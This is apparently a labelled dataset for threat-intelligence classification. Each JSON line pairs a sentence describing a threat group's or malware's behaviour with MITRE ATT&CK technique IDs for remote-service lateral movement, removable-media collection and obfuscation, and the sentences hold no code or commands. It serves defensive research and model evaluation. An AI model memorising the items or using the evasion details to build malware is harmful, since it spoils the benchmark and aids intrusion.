{"text1":"APT39 used secure shell (SSH) to move laterally among their targets.","labels":"['T1021.004']"}
{"text1":"BlackTech has used Putty for remote access.","labels":"['T1021.004']"}
{"text1":"Cobalt Strike can SSH to a remote service.","labels":"['T1021.004']"}
{"text1":"Empire contains modules for executing commands over SSH as well as in-memory VNC agent injection.","labels":"['T1021.004']"}
{"text1":"FIN7 has used SSH to move laterally through victim environments.","labels":"['T1021.004']"}
{"text1":"GCMAN uses Putty for lateral movement.","labels":"['T1021.004']"}
{"text1":"Kinsing has used SSH for lateral movement.","labels":"['T1021.004']"}
{"text1":"Lazarus Group used SSH and the PuTTy PSCP utility to gain access to a restricted segment of a compromised network.","labels":"['T1021.004']"}
{"text1":"Leviathan used ssh for internal reconnaissance.","labels":"['T1021.004']"}
{"text1":"TEMP.Veles has relied on encrypted SSH-based tunnels to transfer tools and for remote command\/program execution.","labels":"['T1021.004']"}
{"text1":"TeamTNT has used SSH to connect back to victim machines. TeamTNT has also used SSH to transfer tools and payloads onto victim hosts and execute them.","labels":"['T1021.004']"}
{"text1":"menuPass has used Putty Secure Copy Client (PSCP) to transfer data.","labels":"['T1021.004']"}
{"text1":"DanBot can use VNC for remote access to targeted systems.","labels":"['T1021.005']"}
{"text1":"FIN7 has used TightVNC to control compromised hosts.","labels":"['T1021.005']"}
{"text1":"Fox Kitten has installed TightVNC server and client on compromised servers and endpoints for lateral movement.","labels":"['T1021.005']"}
{"text1":"GCMAN uses VNC for lateral movement.","labels":"['T1021.005']"}
{"text1":"Gamaredon Group has used VNC tools, including UltraVNC, to remotely interact with compromised hosts.","labels":"['T1021.005']"}
{"text1":"ZxShell supports functionality for VNC sessions.","labels":"['T1021.005']"}
{"text1":"APT29 has used WinRM via PowerShell to execute command and payloads on remote hosts.","labels":"['T1021.006']"}
{"text1":"SILENTTRINITY tracks `TrustedHosts` and can move laterally to these targets via WinRM.","labels":"['T1021.006']"}
{"text1":"Threat Group-3390 has used WinRM to enable remote execution.","labels":"['T1021.006']"}
{"text1":"UNC2452 has used WinRM via PowerShell to execute command and payloads on remote hosts.","labels":"['T1021.006']"}
{"text1":"A Gamaredon Group file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.","labels":"['T1025']"}
{"text1":"An APT28 backdoor may collect the entire contents of an inserted USB device.","labels":"['T1025']"}
{"text1":"AppleSeed can find and collect data from removable media devices.","labels":"['T1025']"}
{"text1":"Aria-body has the ability to collect data from USB devices.","labels":"['T1025']"}
{"text1":"BADNEWS copies files with certain extensions from USB devices to\na predefined directory.","labels":"['T1025']"}
{"text1":"Explosive can scan all .exe files located in the USB drive.","labels":"['T1025']"}
{"text1":"FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by SPACESHIP.","labels":"['T1025']"}
{"text1":"GravityRAT steals files based on an extension list if a USB drive is connected to the system.","labels":"['T1025']"}
{"text1":"Machete had a module in its malware to find, encrypt, and upload files from fixed and removable drives.","labels":"['T1025']"}
{"text1":"ObliqueRAT has the ability to extract data from removable devices connected to the endpoint.","labels":"['T1025']"}
{"text1":"Once a removable media device is inserted back into the first victim, USBStealer collects data from it that was exfiltrated from a second victim.","labels":"['T1025']"}
{"text1":"Prikormka contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB.","labels":"['T1025']"}
{"text1":"Ramsay can collect data from removable media and stage it for exfiltration.","labels":"['T1025']"}
{"text1":"Remsec has a package that collects documents from any inserted USB sticks.","labels":"['T1025']"}
{"text1":"TajMahal has the ability to steal written CD images and files of interest from previously connected removable drives when they become available again.","labels":"['T1025']"}
{"text1":"The FunnyDream FilePakMonitor component has the ability to collect files from removable devices.","labels":"['T1025']"}
{"text1":"Turla RPC backdoors can collect files from USB thumb drives.","labels":"['T1025']"}
{"text1":"A JPIN uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer.","labels":"['T1027']"}
{"text1":"A RedLeaves configuration file is encrypted with a simple XOR key, 0x53.","labels":"['T1027']"}
{"text1":"A Threat Group-3390 tool can encrypt payloads using XOR. Threat Group-3390 malware is also obfuscated using Metasploit\u2019s shikata_ga_nai encoder as well as compressed with LZNT1 compression.","labels":"['T1027']"}
{"text1":"A Volgmer variant is encoded using a simple XOR cipher.","labels":"['T1027']"}
{"text1":"APT-C-36 has used ConfuserEx to obfuscate its variant of Imminent Monitor, compressed payload and RAT packages, and password protected encrypted email attachments to avoid detection.","labels":"['T1027']"}
{"text1":"APT18 obfuscates strings in the payload.","labels":"['T1027']"}
{"text1":"APT19 used Base64 to obfuscate commands and the payload.","labels":"['T1027']"}
{"text1":"APT28 encrypted a .dll payload using RTL and a custom encryption algorithm. APT28 has also obfuscated payloads with base64, XOR, and RC4.","labels":"['T1027']"}
{"text1":"APT29 has used encoded PowerShell commands.","labels":"['T1027']"}
{"text1":"APT3 obfuscates files or information to help evade defensive measures.","labels":"['T1027']"}
{"text1":"APT32 uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation. APT32 has also encoded payloads using Base64 and a framework called \"Dont-Kill-My-Cat (DKMC). APT32 also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.","labels":"['T1027']"}
{"text1":"APT33 has used base64 to encode payloads.","labels":"['T1027']"}
{"text1":"APT34 has used base64-encoded files that are dropped to victims.","labels":"['T1027']"}
{"text1":"APT37 obfuscates strings and payloads.","labels":"['T1027']"}
{"text1":"Action RAT's commands, strings, and domains can be Base64 encoded within the payload.","labels":"['T1027']"}
{"text1":"Anchor has obfuscated code with stack strings and string encryption.","labels":"['T1027']"}
{"text1":"AppleJeus has XOR-encrypted collected system information prior to sending to a C2. AppleJeus has also used the open source ADVObfuscation library for its components.","labels":"['T1027']"}
{"text1":"AppleSeed has the ability to Base64 encode its payload and custom encrypt API calls.","labels":"['T1027']"}
{"text1":"Aria-body has used an encrypted configuration file for its loader.","labels":"['T1027']"}
{"text1":"Astaroth obfuscates its JScript code, and has used an XOR-based algorithm to encrypt payloads twice with different keys.","labels":"['T1027']"}
{"text1":"AuditCred encrypts the configuration.","labels":"['T1027']"}
{"text1":"Avaddon has used encrypted strings.","labels":"['T1027']"}
{"text1":"Avenger has the ability to XOR encrypt files to be sent to C2.","labels":"['T1027']"}
{"text1":"BLINDINGCAN has obfuscated code using Base64 encoding.","labels":"['T1027']"}
{"text1":"BLUELIGHT has a XOR-encoded payload.","labels":"['T1027']"}
{"text1":"BOOSTWRITE has encoded its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit Initialization vector (IV) to evade detection.","labels":"['T1027']"}
{"text1":"BackdoorDiplomacy has obfuscated tools and malware it uses with VMProtect.","labels":"['T1027']"}
{"text1":"Bazar has used XOR, RSA2, and RC4 encrypted files.","labels":"['T1027']"}
{"text1":"BendyBear has encrypted payloads using RC4 and XOR.","labels":"['T1027']"}
{"text1":"BitPaymer has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary.","labels":"['T1027']"}
{"text1":"BlackOasis's first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools.","labels":"['T1027']"}
{"text1":"Blue Mockingbird has obfuscated the wallet address in the payload binary.","labels":"['T1027']"}
{"text1":"BoomBox can encrypt data using AES prior to exfiltration.","labels":"['T1027']"}
{"text1":"Bumblebee has been delivered as password-protected zipped ISO files and used control-flow-flattening to obfuscate the flow of functions.","labels":"['T1027']"}
{"text1":"CARROTBAT has the ability to download a base64 encoded payload and execute obfuscated commands on the infected host.","labels":"['T1027']"}
{"text1":"Carbanak encrypts strings to make analysis more difficult.","labels":"['T1027']"}
{"text1":"Carberp has used XOR-based encryption to mask C2 server locations within the trojan.","labels":"['T1027']"}
{"text1":"Chimera has encoded PowerShell commands.","labels":"['T1027']"}
{"text1":"Chinoxy has encrypted its configuration file.","labels":"['T1027']"}
{"text1":"Cobalt Group obfuscated several scriptlets and code used on the victim\u2019s machine, including through use of XOR and RC4.","labels":"['T1027']"}
{"text1":"Cobalt Strike can hash functions to obfuscate calls to the Windows API and use a public\/private key pair to encrypt Beacon session metadata.","labels":"['T1027']"}
{"text1":"CoinTicker initially downloads a hidden encoded file.","labels":"['T1027']"}
{"text1":"ComRAT has used encryption and base64 to obfuscate its orchestrator code in the Registry. ComRAT has encrypted its virtual file system using AES-256 in XTS mode and has encoded PowerShell scripts.","labels":"['T1027']"}
{"text1":"Comnie uses RC4 and Base64 to obfuscate strings.","labels":"['T1027']"}
{"text1":"Conficker has obfuscated its code to prevent its removal from host machines.","labels":"['T1027']"}
{"text1":"Conti can use compiler-based obfuscation for its code, encrypt DLLs, and hide Windows API calls.","labels":"['T1027']"}
{"text1":"CookieMiner has used base64 encoding to obfuscate scripts on the system.","labels":"['T1027']"}
{"text1":"Cuba has used multiple layers of obfuscation to avoid analysis, including its Base64 encoded payload.","labels":"['T1027']"}
{"text1":"DCSrv's configuration is encrypted.","labels":"['T1027']"}
{"text1":"DRATzarus can be partly encrypted with XOR.","labels":"['T1027']"}
{"text1":"Dacls can encrypt its configuration file with AES CBC.","labels":"['T1027']"}
{"text1":"DanBot can Base64 encode its payload.","labels":"['T1027']"}
{"text1":"Dark Caracal has obfuscated strings in Bandook by base64 encoding, and then encrypting them.","labels":"['T1027']"}
{"text1":"DarkWatchman has used Base64 to encode PowerShell commands. DarkWatchman has been delivered as compressed RAR payloads in ZIP files to victims.","labels":"['T1027']"}
{"text1":"Denis obfuscates its code and encrypts the API names. Denis also encodes its payload in Base64.","labels":"['T1027']"}
{"text1":"Diavol has Base64 encoded the RSA public key used for encrypting files.","labels":"['T1027']"}
{"text1":"Donut can generate encrypted, compressed\/encoded, or otherwise obfuscated code modules.","labels":"['T1027']"}
{"text1":"Dridex's strings are obfuscated using RC4.","labels":"['T1027']"}
{"text1":"Droppers used by Putter Panda use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 \u2013 0xAF to obfuscate payloads.","labels":"['T1027']"}
{"text1":"Drovorub has used XOR encrypted payloads in WebSocket client to server messages.","labels":"['T1027']"}
{"text1":"Dtrack has used a dropper that embeds an encrypted payload as extra data.","labels":"['T1027', 'T1027.009']"}
{"text1":"During C0015, the threat actors used Base64-encoded strings.","labels":"['T1027']"}
{"text1":"During Frankenstein, the threat actors ran encoded commands from the command line.","labels":"['T1027']"}
{"text1":"During Night Dragon, threat actors used a DLL that included an XOR-encoded section.","labels":"['T1027']"}
{"text1":"During Operation CuckooBees, the threat actors executed an encoded VBScript file.","labels":"['T1027']"}
{"text1":"During Operation Dust Storm, the threat actors encoded some payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key; other payloads were Base64-encoded.","labels":"['T1027']"}
{"text1":"During Operation Honeybee, the threat actors used Base64 to encode files with a custom key.","labels":"['T1027']"}
{"text1":"EKANS uses encoded strings in its process kill list.","labels":"['T1027']"}
{"text1":"Earth Lusca used Base64 to encode strings.","labels":"['T1027']"}
{"text1":"Ebury has obfuscated its strings with a simple XOR encryption with a static key.","labels":"['T1027']"}
{"text1":"Elderwood has encrypted documents and malicious executables.","labels":"['T1027']"}
{"text1":"Elise encrypts several of its files, including configuration files.","labels":"['T1027']"}
{"text1":"Ember Bear has obfuscated malware and malicious scripts to help avoid detection.","labels":"['T1027']"}
{"text1":"Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware,  CMD.exe arguments, and PowerShell scripts.","labels":"['T1027']"}
{"text1":"EnvyScout can Base64 encode payloads.","labels":"['T1027']"}
{"text1":"Exaramel for Linux uses RC4 for encrypting the configuration.","labels":"['T1027']"}
{"text1":"Exaramel uses RC4 for encrypting the configuration.","labels":"['T1027']"}
{"text1":"FELIXROOT encrypts strings in the backdoor using a custom XOR algorithm.","labels":"['T1027']"}
{"text1":"FIN6 has used encoded PowerShell commands.","labels":"['T1027']"}
{"text1":"FIN7 has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands.","labels":"['T1027']"}
{"text1":"FIN8 has used environment variables and standard input (stdin) to obfuscate command-line arguments. FIN8 also obfuscates malicious macros delivered as payloads.","labels":"['T1027']"}
{"text1":"FatDuke can use base64 encoding, string stacking, and opaque predicates for obfuscation.","labels":"['T1027']"}
{"text1":"Flagpro has been delivered within ZIP or RAR password-protected archived files.","labels":"['T1027']"}
{"text1":"FlawedGrace encrypts its C2 configuration files with AES in CBC mode.","labels":"['T1027']"}
{"text1":"FoggyWeb has been XOR-encoded.","labels":"['T1027']"}
{"text1":"For Operation Spalax, the threat actors used XOR-encrypted payloads.","labels":"['T1027']"}
{"text1":"Frankenstein has run encoded commands from the command line.","labels":"['T1027']"}
{"text1":"FruitFly executes and stores obfuscated Perl scripts.","labels":"['T1027']"}
{"text1":"GALLIUM used a modified version of HTRAN in which they obfuscated strings such as debug messages in an apparent attempt to evade detection.","labels":"['T1027']"}
{"text1":"GOLD SOUTHFIELD has executed base64 encoded PowerShell scripts on compromised hosts.","labels":"['T1027']"}
{"text1":"Gallmaker obfuscated shellcode used during execution.","labels":"['T1027']"}
{"text1":"Gamaredon Group has delivered self-extracting 7z archive files within malicious document attachments, and used obfuscated or encrypted scripts.","labels":"['T1027']"}
{"text1":"Gazer logs its actions into files that are encrypted with 3DES. It also uses RSA to encrypt resources.","labels":"['T1027']"}
{"text1":"Gelsemium has the ability to compress its components.","labels":"['T1027']"}
{"text1":"GoldMax has written AES-encrypted and Base64-encoded configuration files to disk.","labels":"['T1027']"}
{"text1":"GoldenSpy's uninstaller has base64-encoded its variables.","labels":"['T1027']"}
{"text1":"Goopy's decrypter have been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis.","labels":"['T1027']"}
{"text1":"GravityRAT supports file encryption (AES with the key \"lolomycin2017\").","labels":"['T1027']"}
{"text1":"Green Lambert has encrypted strings.","labels":"['T1027']"}
{"text1":"GreyEnergy encrypts its configuration files with AES-256 and also encrypts its strings.","labels":"['T1027']"}
{"text1":"GrimAgent has used Rotate on Right (RoR) and Rotate on Left (RoL) functionality to encrypt strings.","labels":"['T1027']"}
{"text1":"Group5 disguised its malicious binaries with several layers of obfuscation, including encrypting the files.","labels":"['T1027']"}
{"text1":"H1N1 uses multiple techniques to obfuscate strings, including XOR.","labels":"['T1027']"}
{"text1":"HAWKBALL has encrypted the payload with an XOR-based algorithm.","labels":"['T1027']"}
{"text1":"HTTPBrowser's code may be obfuscated through structured exception handling and return-oriented programming.","labels":"['T1027']"}
{"text1":"HermeticWiper can compress 32-bit and 64-bit driver files with the Lempel-Ziv algorithm.","labels":"['T1027']"}
{"text1":"HermeticWizard has the ability to encrypt PE files with a reverse XOR loop.","labels":"['T1027']"}
{"text1":"Hi-Zor uses various XOR techniques to obfuscate its components.","labels":"['T1027']"}
{"text1":"HiddenWasp encrypts its configuration and payload.","labels":"['T1027']"}
{"text1":"Higaisa used Base64 encoded compressed payloads.","labels":"['T1027']"}
{"text1":"Hildegard has encrypted an ELF file.","labels":"['T1027']"}
{"text1":"HotCroissant has encrypted strings with single-byte XOR and base64 encoded RC4.","labels":"['T1027']"}
{"text1":"ISMInjector is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.","labels":"['T1027']"}
{"text1":"IceApple can use Base64 and \"junk\" JavaScript code to obfuscate information.","labels":"['T1027']"}
{"text1":"If the victim is using PowerShell 3.0 or later, POWERSOURCE writes its decoded payload to an Alternate Data Stream (ADS) named kernel32.dll that is saved in \"%PROGRAMDATA%\\Windows\\\".","labels":"['T1027']"}
{"text1":"Imminent Monitor has encrypted the spearphish attachments to avoid detection from email gateways; the debugger also encrypts information before sending to the C2.","labels":"['T1027']"}
{"text1":"In one version of KeyBoy, string obfuscation routines were used to hide many of the critical values referenced in the malware.","labels":"['T1027']"}
{"text1":"Industroyer uses heavily obfuscated code in its Windows Notepad backdoor.","labels":"['T1027']"}
{"text1":"InnaputRAT uses an 8-byte XOR key to obfuscate API names and other strings contained in the payload.","labels":"['T1027']"}
{"text1":"InvisiMole avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format.","labels":"['T1027']"}
{"text1":"KGH_SPY has used encrypted strings in its installer.","labels":"['T1027']"}
{"text1":"KOCTOPUS has obfuscated scripts with the BatchEncryption tool.","labels":"['T1027']"}
{"text1":"KONNI is heavily obfuscated and includes encrypted configuration files.","labels":"['T1027']"}
{"text1":"Kerrdown can encrypt, encode, and compress multiple layers of shellcode.","labels":"['T1027']"}
{"text1":"Kessel's configuration is hardcoded and RC4 encrypted within the binary.","labels":"['T1027']"}
{"text1":"Kevin has Base64-encoded its configuration file.","labels":"['T1027']"}
{"text1":"KillDisk uses VMProtect to make reverse engineering the malware more difficult.","labels":"['T1027']"}
{"text1":"Lazarus Group has used multiple types of encryption and encoding for their payloads, including AES, Caracachs, RC4, XOR, Base64, and other tricks such as creating aliases in code for Native API function names.","labels":"['T1027']"}
{"text1":"LazyScripter has leveraged the BatchEncryption tool to perform advanced batch obfuscation and encoding techniques.","labels":"['T1027']"}
{"text1":"Leviathan has obfuscated code using base64 and gzip compression.","labels":"['T1027']"}
{"text1":"LightNeuron encrypts its configuration files with AES-256.","labels":"['T1027']"}
{"text1":"Lokibot has obfuscated strings with base64 encoding.","labels":"['T1027']"}
{"text1":"LoudMiner has obfuscated various scripts and encrypted DMG files.","labels":"['T1027']"}
{"text1":"MCMD can Base64 encode output strings prior to sending to C2.","labels":"['T1027']"}
{"text1":"Machete employed some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.","labels":"['T1027']"}
{"text1":"Machete has used pyobfuscate, zlib compression, and base64 encoding for obfuscation. Machete has also used some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.","labels":"['T1027']"}
{"text1":"Many strings in JHUHUGIT are obfuscated with a XOR algorithm.","labels":"['T1027']"}
{"text1":"Maze has decrypted strings and other important information during the encryption process. Maze also calls certain functions dynamically to hinder analysis.","labels":"['T1027']"}
{"text1":"Metamorfo has encrypted payloads and strings.","labels":"['T1027']"}
{"text1":"Micropsia obfuscates the configuration with a custom Base64 and XOR.","labels":"['T1027']"}
{"text1":"Milan can encode files containing information about the targeted system.","labels":"['T1027']"}
{"text1":"Molerats has delivered compressed executables within ZIP files to victims.","labels":"['T1027']"}
{"text1":"More_eggs's payload has been encrypted with a key that has the hostname and processor family information appended to the end.","labels":"['T1027']"}
{"text1":"Moses Staff has used obfuscated web shells in their operations.","labels":"['T1027']"}
{"text1":"Mosquito\u2019s installer is obfuscated with a custom crypter to obfuscate the installer.","labels":"['T1027']"}
{"text1":"Most strings in USBStealer are encrypted using 3DES and XOR and reversed.","labels":"['T1027']"}
{"text1":"MuddyWater has used Daniel Bohannon\u2019s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.","labels":"['T1027']"}
{"text1":"NanHaiShu encodes files in Base64.","labels":"['T1027']"}
{"text1":"NanoCore\u2019s plugins were obfuscated with Eazfuscater.NET 3.3.","labels":"['T1027']"}
{"text1":"OLDBAIT obfuscates internal strings and unpacks them at startup.","labels":"['T1027']"}
{"text1":"Operation Wocao has executed PowerShell commands which were encoded or compressed using Base64, zlib, and XOR.","labels":"['T1027']"}
{"text1":"P.A.S. Webshell can use encryption and base64 encoding to hide strings and to enforce access control once deployed.","labels":"['T1027']"}
{"text1":"POSHSPY appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download.","labels":"['T1027']"}
{"text1":"POWERSTATS uses character replacement, PowerShell environment variables, and XOR encoding to obfuscate code. POWERSTATS's backdoor code is a multi-layer obfuscated, encoded, and compressed blob.  POWERSTATS has used PowerShell code with custom string obfuscation","labels":"['T1027']"}
{"text1":"PS1 is distributed as a set of encrypted files and scripts.","labels":"['T1027']"}
{"text1":"PUNCHBUGGY has hashed most its code's functions and encrypted payloads with base64 and XOR.","labels":"['T1027']"}
{"text1":"PlugX can use API hashing and modify the names of strings to evade detection.","labels":"['T1027']"}
{"text1":"PoetRAT has used a custom encryption scheme for communication between scripts and pyminifier to obfuscate scripts.","labels":"['T1027']"}
{"text1":"PoisonIvy hides any strings related to its own indicators of compromise.","labels":"['T1027']"}
{"text1":"PolyglotDuke can custom encrypt strings.","labels":"['T1027']"}
{"text1":"Pony attachments have been delivered via compressed archive files. Pony also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult.","labels":"['T1027']"}
{"text1":"PowerDuke uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA).","labels":"['T1027', 'T1027.003']"}
{"text1":"PowerPunch can use Base64-encoded scripts.","labels":"['T1027']"}
{"text1":"PowerSploit contains a collection of ScriptModification modules that compress and encode scripts and payloads.","labels":"['T1027']"}
{"text1":"PowerStallion uses a XOR cipher to encrypt command output written to its OneDrive C2 server.","labels":"['T1027']"}
{"text1":"QUADAGENT was likely obfuscated using Invoke-Obfuscation.","labels":"['T1027']"}
{"text1":"QakBot can use obfuscated and encoded scripts; it has also hidden code within Excel spreadsheets by turning the font color to white and splitting it across multiple cells.","labels":"['T1027']"}
{"text1":"REvil has used encrypted strings and configuration files.","labels":"['T1027']"}
{"text1":"ROKRAT can encrypt data prior to exfiltration by using an RSA public key.","labels":"['T1027']"}
{"text1":"RTM strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm. RTM has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR.","labels":"['T1027']"}
{"text1":"Ramsay has base64-encoded its portable executable and hidden itself under a JPG header. Ramsay can also embed information within document footers.","labels":"['T1027']"}
{"text1":"Reaver encrypts some of its files with XOR.","labels":"['T1027']"}
{"text1":"RegDuke can use control-flow flattening or the commercially available .NET Reactor for obfuscation.","labels":"['T1027']"}
{"text1":"Remcos uses RC4 and base64 to obfuscate data, including Registry entries and file paths.","labels":"['T1027']"}
{"text1":"Rifdoor has encrypted strings with a single byte XOR algorithm.","labels":"['T1027']"}
{"text1":"Rocke has modified UPX headers after packing files to break unpackers.","labels":"['T1027']"}
{"text1":"SHARPSTATS has used base64 encoding and XOR to obfuscate PowerShell scripts.","labels":"['T1027']"}
{"text1":"SHOTPUT is obscured using XOR encoding and appended to a valid GIF file.","labels":"['T1027']"}
{"text1":"SQLRat has used a character insertion obfuscation technique, making the script appear to contain Chinese characters.","labels":"['T1027']"}
{"text1":"STARWHALE has been obfuscated with hex-encoded strings.","labels":"['T1027']"}
{"text1":"SUNSPOT encrypted log entries it collected with the stream cipher RC4 using a hard-coded key. It also uses AES128-CBC encrypted blobs for SUNBURST source code and data extracted from the SolarWinds Orion <MsBuild.exe\" process.","labels":"['T1027']"}
{"text1":"SUPERNOVA contained Base64-encoded strings.","labels":"['T1027']"}
{"text1":"Sakula uses single-byte XOR obfuscation to obfuscate many of its files.","labels":"['T1027']"}
{"text1":"SamSam has been seen using AES or DES to encrypt payloads and payload components.","labels":"['T1027']"}
{"text1":"Sandworm Team has used Base64 encoding within malware variants. Sandworm Team has also used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor.","labels":"['T1027']"}
{"text1":"Seasalt obfuscates configuration data.","labels":"['T1027']"}
{"text1":"ShadowPad has encrypted its payload, a virtual file system, and various files.","labels":"['T1027']"}
{"text1":"Shamoon contains base64-encoded strings.","labels":"['T1027']"}
{"text1":"Shark can use encrypted and encoded files for C2 configuration.","labels":"['T1027']"}
{"text1":"ShimRat has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file.","labels":"['T1027']"}
{"text1":"ShimRatReporter encrypted gathered information with a combination of shifting and XOR using a static key.","labels":"['T1027']"}
{"text1":"Sibot has obfuscated scripts used in execution.","labels":"['T1027']"}
{"text1":"Sidewinder has used base64 encoding and ECDH-P256 encryption for scripts and files.","labels":"['T1027']"}
{"text1":"Silence has used environment variable string substitution for obfuscation.","labels":"['T1027']"}
{"text1":"Siloscape itself is obfuscated and uses obfuscated API calls.","labels":"['T1027']"}
{"text1":"Skidmap has encrypted it's main payload using 3DES.","labels":"['T1027']"}
{"text1":"Sliver can encrypt strings at compile time.","labels":"['T1027']"}
{"text1":"Smoke Loader uses a simple one-byte XOR method to obfuscate values in the malware.","labels":"['T1027']"}
{"text1":"SodaMaster can use \"stackstrings\" for obfuscation.","labels":"['T1027']"}
{"text1":"SombRAT can encrypt strings with XOR-based routines and use a custom AES storage format for plugins, configuration, C2 domains, and harvested data.","labels":"['T1027']"}
{"text1":"Some Orz strings are base64 encoded, such as the embedded DLL known as MockDll.","labels":"['T1027']"}
{"text1":"Some data in Remsec is encrypted using RC5 in CBC mode, AES-CBC with a hardcoded key, RC4, or Salsa20. Some data is also base64-encoded.","labels":"['T1027']"}
{"text1":"Some resources in Prikormka are encrypted with a simple XOR operation or encoded with Base64.","labels":"['T1027']"}
{"text1":"Some strings in HOMEFRY are obfuscated with XOR x56.","labels":"['T1027']"}
{"text1":"SoreFang has the ability to encode and RC6 encrypt data sent to C2.","labels":"['T1027']"}
{"text1":"SpeakUp encodes its second-stage payload with Base64.","labels":"['T1027']"}
{"text1":"Squirrelwaffle has been obfuscated with a XOR-based algorithm.","labels":"['T1027']"}
{"text1":"StoneDrill has obfuscated its module with an alphabet-based table or XOR encryption.","labels":"['T1027']"}
{"text1":"StreamEx obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.","labels":"['T1027']"}
{"text1":"Strings in Attor's components are encrypted with a XOR cipher, using a hardcoded key and the configuration data, log files and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA.","labels":"['T1027']"}
{"text1":"SynAck payloads are obfuscated prior to compilation to inhibit analysis and\/or reverse engineering.","labels":"['T1027']"}
{"text1":"SysUpdate can encrypt and encode its configuration file.","labels":"['T1027']"}
{"text1":"TA505 has password-protected malicious Word documents and used base64 encoded PowerShell commands.","labels":"['T1027']"}
{"text1":"TEARDROP created and read from a file with a fake JPG header, and its payload was encrypted with a simple rotating XOR cipher.","labels":"['T1027']"}
{"text1":"Taidoor can use encrypted string blocks for obfuscation.","labels":"['T1027']"}
{"text1":"TeamTNT has encrypted its binaries via AES and encoded files using Base64.","labels":"['T1027']"}
{"text1":"The FIVEHANDS payload is encrypted with AES-128.","labels":"['T1027']"}
{"text1":"The Grandoreiro payload has been delivered encrypted with a custom XOR-based algorithm and also as a base64-encoded ZIP file.","labels":"['T1027']"}
{"text1":"The Helminth config file is encrypted with RC4.","labels":"['T1027']"}
{"text1":"ThreatNeedle has been compressed and obfuscated using RC4, AES, or XOR.","labels":"['T1027']"}
{"text1":"Torisma has been Base64 encoded and AES encrypted.","labels":"['T1027']"}
{"text1":"Trojan.Karagany can base64 encode and AES-128-CBC encrypt data prior to transmission.","labels":"['T1027']"}
{"text1":"Tropic Trooper has encrypted configuration files.","labels":"['T1027']"}
{"text1":"Turian can use VMProtect for obfuscation.","labels":"['T1027']"}
{"text1":"UBoatRAT encrypts instructions in the payload using a simple XOR cipher.","labels":"['T1027']"}
{"text1":"UNC2452 used encoded PowerShell commands.","labels":"['T1027']"}
{"text1":"Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk.\tUrsnif droppers have also been delivered as password-protected zip files that execute base64 encoded PowerShell commands.","labels":"['T1027']"}
{"text1":"Valak has the ability to base64 encode and XOR encrypt strings.","labels":"['T1027']"}
{"text1":"Variants of Emissary encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the \"srand\" and \"rand\" functions.","labels":"['T1027']"}
{"text1":"Waterbear has used RC4 encrypted shellcode and encrypted functions.","labels":"['T1027']"}
{"text1":"WhisperGate can Base64 encode strings, store downloaded files in reverse byte order,  and use the Eazfuscator tool to obfuscate its third stage.","labels":"['T1027']"}
{"text1":"Whitefly has encrypted the payload used for C2.","labels":"['T1027']"}
{"text1":"WindTail can be delivered as a compressed, encrypted, and encoded payload.","labels":"['T1027']"}
{"text1":"Winnti for Linux can encode its configuration file with single-byte XOR encoding.","labels":"['T1027']"}
{"text1":"Winnti for Windows has the ability to encrypt and compress its payload.","labels":"['T1027']"}
{"text1":"Wizard Spider used Base64 encoding to obfuscate an Empire service and PowerShell commands.","labels":"['T1027']"}
{"text1":"ZeroT has encrypted its payload with RC4.","labels":"['T1027']"}
{"text1":"Zeus Panda encrypts strings with XOR and obfuscates the macro code from the initial payload. Zeus Panda also encrypts all configuration and settings in AES and RC4.","labels":"['T1027']"}
{"text1":"hides any strings related to its own indicators of compromise.","labels":"['T1027', 'T1027']"}
{"text1":"jRAT\u2019s Java payload is encrypted with AES. Additionally, backdoor files are encrypted using DES as a stream cipher. Later variants of jRAT also incorporated AV evasion methods such as Java bytecode obfuscation via the commercial Allatori obfuscation tool.","labels":"['T1027']"}
{"text1":"njRAT has included a base64 encoded executable.","labels":"['T1027']"}
{"text1":"A version of XTunnel introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products.","labels":"['T1027.001']"}
{"text1":"APT29 has used large file sizes to avoid detection.","labels":"['T1027.001']"}
{"text1":"BRONZE BUTLER downloader code has included \"0\" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.","labels":"['T1027.001']"}
{"text1":"Before writing to disk, Kwampirs inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.","labels":"['T1027.001']"}
{"text1":"Bisonal has appended random binary data to the end of itself to generate a large binary.","labels":"['T1027.001']"}
{"text1":"CORESHELL contains unused machine instructions in a likely attempt to hinder analysis.","labels":"['T1027.001']"}
{"text1":"Comnie appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.","labels":"['T1027.001']"}
{"text1":"CostaBricks has added the entire unobfuscated code of the legitimate open source application Blink to its code.","labels":"['T1027.001']"}
{"text1":"Ember Bear has added extra spaces between JavaScript code characters to increase the overall file size.","labels":"['T1027.001']"}
